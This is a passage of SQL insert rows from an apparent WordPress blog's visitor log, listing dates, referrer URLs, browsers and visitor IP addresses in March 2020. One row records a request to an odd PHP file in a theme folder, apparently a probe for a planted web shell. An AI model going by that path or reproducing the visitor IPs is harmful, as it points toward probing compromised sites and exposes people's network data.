(579,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','125.161.139.139','000',0,1,0),
(580,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','178.64.207.251','000',0,1,0),
(581,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','203.202.241.26','000',0,1,0),
(582,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','46.35.192.36','000',0,1,0),
(583,'2020-03-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.124.215','000',0,1,0),
(584,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','171.228.154.212','000',0,1,0),
(585,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','42.113.92.34','000',0,1,0),
(586,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','103.74.111.52','000',0,1,0),
(587,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','197.56.52.202','000',0,1,0),
(588,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','117.252.221.135','000',0,1,0),
(589,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','41.108.27.93','000',0,1,0),
(590,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','49.150.102.62','000',0,1,0),
(591,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','95.70.210.111','000',0,1,0),
(592,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','27.5.162.221','000',0,1,0),
(593,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','49.48.143.159','000',0,1,0),
(594,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','46.32.202.254','000',0,1,0),
(595,'2020-03-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','169.197.108.42','000',0,2,0),
(596,'2020-03-15','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(597,'2020-03-15','http://ictbank.ir/blog','Firefox','Fedora','Unknown',NULL,NULL,'','79.127.96.129','000',0,1,0),
(598,'2020-03-15','http://www.design-arena.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','185.174.159.18','000',0,1,0),
(599,'2020-03-16','http://ictbank.ir/blog','Chrome','OS X','10.8.0',NULL,NULL,'','123.245.27.26','000',0,1,0),
(600,'2020-03-16','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','141.98.10.43','000',0,3,0),
(601,'2020-03-16','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.6.183.226','000',0,2,0),
(602,'2020-03-16','http://82.102.9.14/blog/wp-content/themes/chigue/cheapy.php','Firefox','Windows','5.1',NULL,NULL,'','89.234.68.91','000',0,3,0),
(603,'2020-03-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','192.232.16.8','000',0,1,0),
(604,'2020-03-16','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(605,'2020-03-16','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(606,'2020-03-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.218.251.16','000',0,1,0),
(607,'2020-03-16','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','157.51.133.134','000',0,1,0),
(608,'2020-03-16','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','86.57.167.139','000',0,1,0),
(609,'2020-03-16','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','80.180.20.195','000',0,1,0),
(610,'2020-03-16','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','105.107.85.89','000',0,1,0),
(611,'2020-03-16','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','117.198.86.125','000',0,1,0),
(612,'2020-03-16','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','103.142.134.6','000',0,1,0),
(613,'2020-03-16','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','188.168.75.253','000',0,1,0),
(614,'2020-03-16','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','122.170.222.215','000',0,1,0),
(615,'2020-03-16','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','158.140.188.82','000',0,1,0),
(616,'2020-03-16','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','47.31.119.211','000',0,1,0),
(617,'2020-03-16','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','2.50.49.226','000',0,1,0),
(618,'2020-03-16','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','86.127.162.35','000',0,1,0),
(619,'2020-03-16','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','195.175.57.110','000',0,1,0),
(620,'2020-03-16','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','78.137.7.89','000',0,1,0),
(621,'2020-03-16','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','183.82.32.8','000',0,1,0),
(622,'2020-03-16','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','81.17.86.86','000',0,1,0),
(623,'2020-03-16','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','49.49.247.99','000',0,1,0),
(624,'2020-03-16','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','117.247.204.148','000',0,1,0),
(625,'2020-03-16','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','41.37.160.154','000',0,1,0),
(626,'2020-03-16','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','45.147.253.138','000',0,1,0),
(627,'2020-03-16','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','95.59.77.27','000',0,1,0),
(628,'2020-03-16','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','43.231.54.190','000',0,1,0),
(629,'2020-03-16','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','116.50.70.64','000',0,1,0),
(630,'2020-03-16','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','113.23.64.173','000',0,1,0),
(631,'2020-03-16','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','158.181.42.100','000',0,1,0),
(632,'2020-03-16','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','113.181.14.34','000',0,1,0),
(633,'2020-03-16','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','180.251.139.161','000',0,1,0),
(634,'2020-03-16','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','59.96.39.174','000',0,1,0),
(635,'2020-03-16','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','186.89.220.247','000',0,1,0),
(636,'2020-03-16','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','87.196.48.53','000',0,1,0),
(637,'2020-03-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.88.58.171','000',0,1,0),
(638,'2020-03-16','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','69.162.65.34','000',0,2,0),
(639,'2020-03-16','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','111.224.249.66','000',0,1,0),
(640,'2020-03-16','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.27','000',0,4,0),
(641,'2020-03-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.26','000',0,1,0),
(642,'2020-03-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.24','000',0,4,0),
(643,'2020-03-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.25','000',0,1,0),
(644,'2020-03-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','36.99.136.140','000',0,1,0),
(645,'2020-03-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','36.99.136.142','000',0,2,0),
(646,'2020-03-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','36.99.136.138','000',0,1,0),
(647,'2020-03-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.23','000',0,5,0),
(648,'2020-03-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.21','000',0,1,0),
(649,'2020-03-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','36.99.136.133','000',0,1,0),
(650,'2020-03-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','36.99.136.132','000',0,2,0),
(651,'2020-03-16','http://ictbank.ir/blog','Firefox','Windows','6.2',NULL,NULL,'','3.101.31.128','000',0,1,0),
(652,'2020-03-17','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','138.197.138.211','000',0,1,0),
(653,'2020-03-17','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','138.197.131.30','000',0,1,0),
(654,'2020-03-17','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','203.78.141.31','000',0,1,0),
(655,'2020-03-17','http://ictbank.ir/blog','Unknown','Windows','5.1',NULL,NULL,'','94.130.167.248','000',0,1,0),
(656,'2020-03-17','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.35','000',0,1,0),
(657,'2020-03-17','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(658,'2020-03-17','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','140.143.16.158','000',0,2,0),
(659,'2020-03-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(660,'2020-03-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.228.242','000',0,1,0),
(661,'2020-03-17','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','45.41.142.125','000',0,1,0),
(662,'2020-03-17','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','45.41.142.141','000',0,1,0),
(663,'2020-03-17','http://ictbank.ir/blog','Chrome','OS X','10.10.5',NULL,NULL,'','35.180.20.168','000',0,4,0),
(664,'2020-03-17','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','185.152.250.137','000',0,1,0),
(665,'2020-03-17','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','185.152.250.1','000',0,1,0),
(666,'2020-03-17','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','185.152.250.59','000',0,1,0),
(667,'2020-03-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.163.48.27','000',0,1,0),
(668,'2020-03-17','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','141.98.10.43','000',0,1,0),
(669,'2020-03-17','http://82.102.9.14:80/blog','Firefox','Windows','6.0',NULL,NULL,'','49.235.190.53','000',0,2,0),
(670,'2020-03-18','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','129.211.9.250','000',0,2,0),
(671,'2020-03-18','http://design-arena.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','216.151.20.198','000',0,2,0),
(672,'2020-03-18','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','3.85.8.34','000',0,1,0),
(673,'2020-03-18','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','3.95.135.253','000',0,1,0),
(674,'2020-03-18','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(675,'2020-03-18','http://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','94.242.54.58','000',0,1,0),
(676,'2020-03-18','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','180.163.220.3','000',0,2,0),
(677,'2020-03-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.242.65','000',0,1,0),
(678,'2020-03-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.40.161.129','000',0,1,0),
(679,'2020-03-18','http://82.102.9.14:80/blog','Firefox','Windows','6.0',NULL,NULL,'','140.143.16.158','000',0,1,0),
(680,'2020-03-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.178','000',0,2,0),
(681,'2020-03-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(682,'2020-03-18','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','141.98.10.43','000',0,1,0),
(683,'2020-03-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.88.239','000',0,2,0),
(684,'2020-03-18','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.57.40.38','000',0,2,0),
(685,'2020-03-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','66.102.8.84','000',0,1,0),
(686,'2020-03-18','https://google.com/search?p=8892736152189&gags=18','Firefox','Windows','15.2',NULL,NULL,'','141.98.90.216','000',0,2,0),
(687,'2020-03-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.20.103.178','000',0,2,0),
(688,'2020-03-19','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.92','000',0,1,0),
(689,'2020-03-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.218.47.146','000',0,1,0),
(690,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.233.123.147','000',0,9,0),
(691,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.199.39.182','000',0,3,0),
(692,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.190.217.123','000',0,2,0),
(693,'2020-03-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.88.225','000',0,2,0),
(694,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.195.112.63','000',0,4,0),
(695,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','159.65.250.53','000',0,5,0),
(696,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.83.217','000',0,2,0),
(697,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','159.203.82.165','000',0,1,0),
(698,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','159.89.90.89','000',0,2,0),
(699,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.22.99','000',0,2,0),
(700,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.57.105','000',0,2,0),
(701,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','146.148.4.94','000',0,1,0),
(702,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','18.217.133.252','000',0,7,0),
(703,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.241.181.112','000',0,4,0),
(704,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.118.157','000',0,2,0),
(705,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.41.218','000',0,2,0),
(706,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','3.219.254.95','000',0,11,0),
(707,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.58.13','000',0,2,0),
(708,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','142.93.76.13','000',0,2,0),
(709,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','142.93.176.179','000',0,3,0),
(710,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.175.77','000',0,2,0),
(711,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.241.168.248','000',0,6,0),
(712,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.47.67','000',0,1,0),
(713,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.72.29','000',0,6,0),
(714,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.62.20','000',0,6,0),
(715,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.116.111','000',0,2,0),
(716,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.34.89','000',0,1,0),
(717,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.199.60.225','000',0,2,0),
(718,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.239.17','000',0,4,0),
(719,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.99.33','000',0,2,0),
(720,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.166.233','000',0,1,0),
(721,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.248.96','000',0,2,0),
(722,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.55.39.61','000',0,2,0),
(723,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.62.5','000',0,6,0),
(724,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.52.204','000',0,1,0),
(725,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.237.136.79','000',0,4,0),
(726,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','69.164.196.190','000',0,1,0),
(727,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','159.203.110.227','000',0,1,0),
(728,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.155.56.250','000',0,1,0),
(729,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.187.175.53','000',0,1,0),
(730,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.155.91.212','000',0,2,0),
(731,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.168.128','000',0,1,0),
(732,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.226.146','000',0,1,0),
(733,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.131.11.158','000',0,1,0),
(734,'2020-03-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.0.2','000',0,1,0),
(735,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.57.100','000',0,4,0),
(736,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.233.101.61','000',0,2,0),
(737,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.241.136.97','000',0,3,0),
(738,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.242.234','000',0,3,0),
(739,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.195.48.115','000',0,1,0),
(740,'2020-03-19','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','159.138.229.227','000',0,1,0),
(741,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.90.1','000',0,4,0),
(742,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.72.151','000',0,1,0),
(743,'2020-03-19','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','47.101.189.169','000',0,1,0),
(744,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','159.203.85.125','000',0,1,0),
(745,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','159.203.68.196','000',0,1,0),
(746,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.26.16','000',0,2,0),
(747,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','165.227.76.53','000',0,1,0),
(748,'2020-03-19','http://ictbank.ir/blog','Unknown','iOS','Unknown',NULL,NULL,'','204.18.21.215','000',0,2,0),
(749,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.1.178','000',0,1,0),
(750,'2020-03-19','http://ictbank.ir/blog','Chrome','OS X','10.14.5',NULL,NULL,'','34.217.136.243','000',0,2,0),
(751,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.57.101','000',0,2,0),
(752,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.115.246','000',0,1,0),
(753,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.187.189.212','000',0,1,0),
(754,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.233.109.246','000',0,1,0),
(755,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.51.251','000',0,4,0),
(756,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.102.0','000',0,1,0),
(757,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.50.30','000',0,5,0),
(758,'2020-03-19','http://ictbank.ir/blog','Unknown','iOS','10.3.3',NULL,NULL,'','54.164.208.254','000',0,1,0),
(759,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.195.82.42','000',0,2,0),
(760,'2020-03-19','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(761,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.73.26','000',0,2,0),
(762,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.49.79','000',0,6,0),
(763,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.94.123','000',0,3,0),
(764,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.57.5','000',0,2,0),
(765,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.151.65','000',0,5,0),
(766,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.162.119','000',0,2,0),
(767,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.153.71','000',0,1,0),
(768,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','159.69.13.232','000',0,2,0),
(769,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.217.116','000',0,2,0),
(770,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.189.240.149','000',0,2,0),
(771,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.62.4','000',0,2,0),
(772,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.187.78.220','000',0,1,0),
(773,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.241.167.233','000',0,2,0),
(774,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.200.82','000',0,3,0),
(775,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.74.148','000',0,2,0),
(776,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.18.26','000',0,1,0),
(777,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.79.175','000',0,1,0),
(778,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.182.75','000',0,3,0),
(779,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.1.8','000',0,1,0),
(780,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.187.44.33','000',0,3,0),
(781,'2020-03-19','http://ictbank.ir/dashtpodcast/','Instagram','iOS','12.4',NULL,NULL,'','125.58.89.49','000',0,4,0),
(782,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.90.133','000',0,2,0),
(783,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.195.82.169','000',0,1,0),
(784,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.57.20','000',0,8,0),
(785,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.195.120.193','000',0,2,0),
(786,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.233.125.207','000',0,3,0),
(787,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.233.91.79','000',0,2,0),
(788,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.118.198','000',0,1,0),
(789,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.57.21','000',0,4,0),
(790,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.186.32','000',0,1,0),
(791,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.53.249','000',0,4,0),
(792,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.233.25.145','000',0,2,0),
(793,'2020-03-19','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','104.236.12.253','000',0,1,0),
(794,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.86.101','000',0,2,0),
(795,'2020-03-19','http://ictbank.ir/blog','Unknown','iOS','Unknown',NULL,NULL,'','213.207.248.206','000',0,1,0),
(796,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.79.235','000',0,2,0),
(797,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.62.21','000',0,4,0),
(798,'2020-03-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.93.229.49','000',0,1,0),
(799,'2020-03-19','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(800,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.55.28','000',0,2,0),
(801,'2020-03-19','http://www.ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','46.4.167.153','000',0,3,0),
(802,'2020-03-19','http://ictbank.ir/blog','Unknown','iOS','Unknown',NULL,NULL,'','151.242.164.122','000',0,3,0),
(803,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.95.43','000',0,3,0),
(804,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.199.62.7','000',0,4,0),
(805,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.233.92.122','000',0,1,0),
(806,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','146.148.112.172','000',0,1,0),
(807,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','130.211.104.224','000',0,2,0),
(808,'2020-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.233.38.65','000',0,1,0),
